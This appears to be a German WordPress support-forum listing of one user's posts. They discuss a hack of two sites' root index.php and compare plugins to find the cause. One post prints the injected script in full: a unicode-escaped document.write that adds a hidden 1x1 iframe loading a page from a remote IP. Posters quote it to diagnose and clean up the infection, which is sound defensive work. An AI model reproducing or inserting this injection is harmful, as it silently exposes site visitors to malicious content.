Beiträge von Woodstock

    Ähh, wie jetzt :confused: :confused: Es geht mir hier überhaupt nicht darum, WordPress irgendwas 'anzulasten'. Ich habe mich an diesen Thread gehängt, da zwei meiner Seiten auf genau die gleiche Weise gehackt worden sind wie die Seite der Threaderstellerin und es vielleicht ganz interessant wäre, den Grund des Übels herauszukriegen. Ich habe hier, wenn ich richtig lese, nirgends geschrieben "dies Plugin nicht, aber dafür das dort und jenes sag ich gar nicht erst, hab ich aber doch laufen".
    Noch mal zu den Einzelheiten:

    Befallen war die index.php im Rootverzeichnis meiner beiden Seiten, die sah so aus:

    PHP
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><!-- ~ --><!-- Nerzul --><script type="text/javascript">
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
    </script><!-- Nerzul --><!-- ~ -->


    Dieser JavaScript-Aufruf ließ sich zwar schnell und simpel wieder aus der index.php entfernen; die Frage ist aber, wie kam er da rein?

    Ich kann auch gerne die Plugins meiner zwei befallenen Seiten noch mal explizit aufführen:

    Seite 1 hat folgende installierte und aktivierte Plugins:
    1. Semmelstatz (das momentan wohl nicht zum Download bereitsteht, daher kein Link)
    2. Shutter Reloaded

    Seite 2 hat die 2 oben genannten nicht installiert, was einfach eine Annahme meinerseits dafür sein sollte, dass sie also wohl eher nicht als Ursache in Frage kommen, und nicht als 'Verschleierung meines Pluginumfeldes' gedacht war. Es sind dort installiert:
    1. Custom Query String
    2. Less
    3. PXS Mailform
    4. WP-Forecast
    5. Zap_NewWindow

    Das Paged-Comments-Plugin ist auf keiner dieser Seiten installiert, ich habe auch keine Ahnung, warum das hier überhaupt thematisiert wurde.

    Svenja, es wäre schön, wenn du deine Plugins hier auch nochmal kurz auflistest, damit wir vergleichen können, ob es da eventuell irgendwelche Übereinstimmungen gibt.

    Monika, nein, wie ich oben geschrieben habe, ist auf einer der betroffenen Seiten lediglich Semmelstatz und Shutter Reloaded installiert, und das Plugin, über das codestyling schreibt, ist auf der zweiten meiner betroffenen Seiten ebenfalls nicht installiert. Auf dieser zweiten Seite sind Semmelstatz und Shutter Reloaded übrigens nicht installiert. Also sehe ich pluginmäßig keine Zusammenhänge.

    ja das geht auch leichter...

    und deswegen, weil man wo eine Schwachstelle hat, muss ein *zufällig durchs WWW* jagender Angreifer einem noch nicht gefunden haben.

    informier den Pluginautoren, das ist immer die erste Anlaufstelle

    lg


    Was meinst du denn, welchen Pluginautor?

    Ich hab mir das Plugin mal runtergeladen, das du als Paged Comments auf deinen Seiten beschreibst.
    Ich hab es nur überflogen (weil schon sehr spät/oder früh ist?) aber das scheint mir Potential für DB Injection zu haben


    Es ist allerdings so, dass die Seiten, auf denen ich Paged Comments einsetze, alle nicht befallen waren, auch mein Testblog, den ich hier in meiner Signatur habe, nicht. Es ist (bislang) auch keine Seite betroffen, bei der WP in einem Unterverzeichnis läuft, sondern nur Seiten, in denen es im Root installiert ist.
    Gravatare nutze ich nicht.

    Wäre es möglich eine Pluginliste zu bekommen (am Besten mit Download Links und von mir aus auch als PM), damit ich das mal analysieren kann ?


    Plugins sind so gut wie keine installiert: Semmelstatz, zu dem es momentan wohl keinen Downloadlink gibt, und Shutter Reloaded.


    Sollte man eigentlich. Es hat ja nicht nur den Nachteil, das potentielle Kunden abgeschreckt und Bestandskunden schockiert sind, wenn deren Virensucher aufschreit, sondern Google stellt irgendwann deine Seite als potentiell gefährlich in der Suchanfrage dar! Das geht dann auch nicht mehr von allein weg, da mußt du Google kontaktieren.


    Ich würde schnellstens den Code aus der index.php löschen!

    Ist wäre wichtig zu wissen, ob das schon vor 2.5.1 drin war und du es nur durch ein Update quasi übernommen hast oder ob er es geschafft hat, sich in eine pure 2.5.1 direkt einzunisten. Das ist ein himmelweiter Unterschied.


    Ich habe ihn nicht übernommen, er ist erst nach dem Update aufgetaucht.

    Ich hatte genau den gleichen in 2 WP-Installationen (unter 2.5.1). Er sitzt in der index.php im Rootverzeichnis. Während die Seite lädt, sieht man unten in der Statusleiste, dass versucht wird, ein 'xanjan.cn' zu laden.

    So richtig viel kann man mit der Galeriefunktion nicht machen. Du kannst aber zumindest die Anzeigereihenfolge umdrehen, indem du die Galerie mit [gallery orderby="ID DESC"] aufrufst. Hier stehen ein paar Infos dazu.